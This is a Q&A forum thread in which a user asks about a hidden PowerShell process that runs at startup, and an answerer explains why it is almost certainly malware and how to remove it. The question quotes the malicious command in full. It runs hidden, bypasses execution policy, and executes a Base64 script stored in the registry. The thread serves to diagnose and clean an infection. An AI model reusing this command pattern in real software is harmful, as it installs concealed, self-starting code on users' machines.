Random powershell.exe process?

4

I noticed a couple days ago in Task Manager that I have a powershell.exe process running. When I went to msconfig it has a really long command. Here it is:

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)));

This is really weird because just today a random process that I had problems with before showed up (maybe it's not connected with this but just saying) which is a virus and tried to download an unsecured driver, as Windows says, on my PC. Could anyone tell me something about this PowerShell process? It starts up on startup and it's always running. Again, I hope I don't sound ignorant, maybe it's just a normal startup process.

VoLtury Bey

Posted 2016-09-19T21:18:16.237

Reputation: 75

Can this be harmful? If yes, how do I get rid of it, and if not, is this process important to Windows so I can just make it stop running on startup? – VoLtury Bey – 2016-09-19T21:27:24.603

Answers

9

This is almost certainly malicious.

Let's take it apart. It invokes Windows PowerShell (a legitimate and very useful command interpreter) without user customizations (-noprofile) in a hidden window (-windowstyle hidden), allowing the PowerShell session to run scripts regardless of the system policy (-executionpolicy bypass). It then runs this command:

iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)))

gp means Get-ItemProperty, which can be used to retrieve values of Registry keys, and that's what it's doing here. Apparently, there's a key called SAJELFZIXHQTV in your current user Software\Classes key. That key has a value called ADUXJH, the data in which is what gp retrieves. That data (evidently a string) is then Base64-decoded into a byte array (FromBase64String). Those bytes are then interpreted as ASCII text (ASCII.GetString). Bizarrely, there's an extra dot in the original, which should cause an error because the ASCII object has no member called Get. Given that the process sticks around, though, I suspect the extra dot is just a transcription error.

If that error wasn't there, the resulting text would be invoked as a PowerShell command (iex). In short, this command is designed to load an encoded script from the Registry and execute it. To see exactly what it's running, copy the above PowerShell command minus the iex and with the extra dot removed into a PowerShell prompt and run it. It will print the command that would be invoked. It almost certainly won't be benign.

You can stop that entry from auto-starting with the Autoruns tool. However, it's probably a good idea to do a deeper clean of your machine, since it's likely infected. Please see How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?

Ben N

Posted 2016-09-19T21:18:16.237

Reputation: 32 973

So, in short: this is a bad thing, right? Can you just explain what this thing is doing in a simpler way if it's possible? I'm a little worried right now since I've had this powershell process for a long time now and nothing has happened yet. – VoLtury Bey – 2016-09-19T21:49:18.127

3@VoLturyBey Yes, it's probably a bad thing. It loads an encoded command from the Registry and executes it in the background, which is a moderately sketchy thing to do. I can't know exactly what that command does because it's only present in your Registry. Could you run the PowerShell command I included (minus the iex and with the extra dot fixed) please? That will show us what it's doing. – Ben N – 2016-09-19T21:51:27.610

Can it harm my PC if I do that? – VoLtury Bey – 2016-09-19T21:52:15.357

@VoLturyBey Without the iex, it will only show what it's already been running. That can't harm you, but what it's been doing is very likely malicious. – Ben N – 2016-09-19T21:53:56.390

I'm formatting my hdd in two or three days, do you guys think it's gonna do something bad until I do that? – VoLtury Bey – 2016-09-19T21:54:07.600

@VoLturyBey I wouldn't expect it to do anything different from what it has been doing, but I can't know for sure without seeing what it's executing. – Ben N – 2016-09-19T21:56:21.477

I think I'm just gonna wait until I format my PC. If it's been doing the same thing for the last month or two I don't think it's gonna do something really serious to my machine, right? I don't need you to 100% guarantee that it won't do anything, I understand that I didn't provide that much info, but I just want to know what you think. – VoLtury Bey – 2016-09-19T22:00:55.697

I would really like to know so I can just go to sleep without worrying about stuff... – VoLtury Bey – 2016-09-19T22:08:41.137

1@VoLturyBey If it was me, I would be cleaning my computer very soon, but if you're not worried about anything it's already done, then I wouldn't expect anything to change within a couple days. – Ben N – 2016-09-19T22:09:32.067

Alright, I'll just format it in like two or three days. If something happened I'd just be the most unlucky dude on this site. Everything that's important has been backed up in multiple ways. I honestly don't care about any of my files on the PC. It's just that I need it for university and stuff tomorrow. – VoLtury Bey – 2016-09-19T22:12:49.513

Yeah I have my whole family using this pc... It could be them that got this thing on here. I don't know how to restrict them, all I can do is just tell them to be careful since I don't go to any weird sites and I never download unsafe programs or files. – VoLtury Bey – 2016-09-19T22:17:59.380

@Homey_D_Clown_IT I'm just wondering what's your opinion on this. Am I going to be safe for the next 2-3 days? Would you expect anything to happen? – VoLtury Bey – 2016-09-19T22:19:12.563

Well, I guess I'm safe then. Everything important has been backed up and I don't really have any bank info or stuff like that on my pc. You guys saved me from a sleepless night.. – VoLtury Bey – 2016-09-19T22:25:30.937

Asked: 2016-09-19T21:18:16.237

Viewed: 1 131 times

Active: 2016-09-19T22:21:37.940